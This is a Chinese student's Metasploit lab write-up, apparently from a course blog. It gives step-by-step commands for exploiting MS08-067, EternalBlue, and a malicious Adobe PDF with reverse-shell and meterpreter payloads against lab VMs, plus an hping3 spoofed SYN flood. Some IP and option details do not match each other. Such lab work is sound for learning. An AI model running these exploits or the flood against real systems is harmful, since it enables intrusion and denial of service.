标签:序列 请求 图片 ima 开始 实验 辅助 host 开放
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。实现:
用自己的话解释什么是exploit,payload,encode.
攻击机Kali:10.1.1.169
靶机Win2000:10.1.1.154
payload:windows/shell_reverse_tcp
msfconsole
进入控制台search ms08-067
查找漏洞
use exploit/windows/smb/ms08_067_netapi
指令选择漏洞show options
查看设置信息
set RHOSTS 10.1.1.154
设置Win2000 IP
search portscan
搜索端口
use auxiliary/scanner/portscan/tcp
选择漏洞show options
查看设置信息
set RHOSTS 10.1.1.154
exploit
看到445端口开放
use exploit/windows/smb/ms08_067_netapi
show payloads
查看可用payload
如上图,输入set payload windows/shell_reverse_tcp
选择payload
show options
exploit
进行攻击成功
攻击机Kali:192.168.43.91
靶机Win7专业版:192.168.43.182
payload:generic/shell_reverse_tcp
msfconsole
进入控制台search ms17-010
查找漏洞
use exploit/windows/smb/ms17_010_eternalblue
指令选择漏洞show payloads
显示可用攻击载荷
set payload generic/shell_reverse_tcp
选择攻击载荷
show options
查看配置信息
set LHOSTS 192.168.43.91
设置Kali IP
set RHOSTS 192.168.43.182
设置Win7 IP
exploit
进行攻击成功
攻击机Kali:10.1.1.169
靶机WinXPattacker:10.1.1.194
payload:windows/meterpreter/reverse_tcp
msfconsole
进入控制台search adobe
查找漏洞
use windows/fileformat/adobe_cooltype_sing
指令选择漏洞show payloads
显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.169
设置Kali IP
set LPORT 5306
设置攻击端口
set FILENAME 5306.pdf
设置生成的pdf文件名
exploit
cd /root/.msf4/local
进入pdf文件保存目录
cp 5306XYH.pdf /mnt/hgfs/XYH
把pdf文件复制到与主机的共享文件夹中,再把pdf从主机拖到winXP
back
退出当前模块
use exploit/multi/handler
进入监听模块
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.169
设置kali IP
set LPORT 5306
设置攻击端口
exploit
开始监听
回到Kali发现回连成功
攻击机Kali:10.1.1.169
靶机Win7:10.1.1.113
漏洞:dos/tcp/synflood(唯一)
msfconsole
进入控制台show auxiliary
命令显示所有的辅助模块以及他们的用途
一眼相中TCP SYN FLOODER
SYN:同步序列编号(Synchronize Sequence Numbers),是TCP/IP建立连接时使用的握手信号。
SYN Flood利用TCP协议缺陷,通过一定的操作破坏TCP三次握手建立正常连接,占用并耗费系统资源,使得被攻击方资源耗尽,无法及时回应或处理正常的服务请求。
攻击原理:通常,客户端在短时间内伪造大量不存在的IP地址,向服务器不断地发送syn包,服务器回复确认包,在进行第三次握手时,服务器等待客户的确认,由于源地址是不存在的,服务器需要不断的重发直至超时,才将此条目从未连接队列删除。这些伪造的SYN包将长时间占用未连接队列,正常的SYN请求不能进去以及被丢弃,目标系统运行缓慢,引起网络拥堵。
Ctrl+Alt+Ins
启动任务管理器查看性能
,监控CPU的利用率,开启Wireshark抓包
hping3 -q -n -a 5.3.0.6 -S -s 5306 --keep -p 445 --flood 10.1.1.113
其中5.3.0.6为伪造源IP,5306为伪造源端口,445为目的端口,10.1.1.113为目的IP
如图,Win7的性能利用率已经达到99%并居高不下。Wireshark抓到的包显示大量源地址为5.3.0.6,在给靶机win7发送请求连接,进行SYN Flood攻击。综上表明已经攻击成功。
Ctrl+C
结束攻击查看Win7的任务管理器,性能利用率恢复正常。
标签:序列 请求 图片 ima 开始 实验 辅助 host 开放
原文地址:https://www.cnblogs.com/5306xyh/p/10739585.html